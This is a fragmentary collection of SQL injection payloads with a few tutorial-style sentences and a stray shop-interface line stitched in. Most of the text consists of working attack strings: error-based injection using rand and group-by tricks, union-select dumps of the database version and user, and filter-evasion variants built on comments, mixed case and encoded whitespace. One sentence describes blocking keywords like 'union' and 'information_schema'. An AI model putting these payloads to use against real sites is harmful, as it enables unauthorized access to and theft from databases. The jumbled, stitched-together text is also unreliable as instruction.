and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1. Now trying this syntax in our site.
...NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT%28version(),0x3a,user()),NULL
View as Grid List. 1 Item.
0x39313335313435363237322e39 is just the hex text of 91351456272.9.
union all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select +union+distinct+select+ +union+distinctROW+select+
On my site, for instance, it's entirely safe to fail any request with the string 'concat' or %20union' or 'information_schema'. Indeed, I can even ban any IP that so much as bothers to attempt a request including such strings.
+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))). URL will look like
+and+(select+*+from+(select+*+from+information_schema.tables+as+x+join+information_schema.tables+y+using+(TABLE_CATALOG))as+z)--. Duplicate column name 'TABLE_SCHEMA'. That's it for now, I'll try and update this when I learn more methods of error based injection.
You can clearly see rules containing keywords "select", "union", "all" etc.
+--+Union+--+Select+--+ +#uNiOn+#sEleCt+ +union+distinct+select+ +union+distinctROW+select+ +union%23aa%0Aselect+ 0%a0union%a0select%09 %0Aunion%0Aselect%0A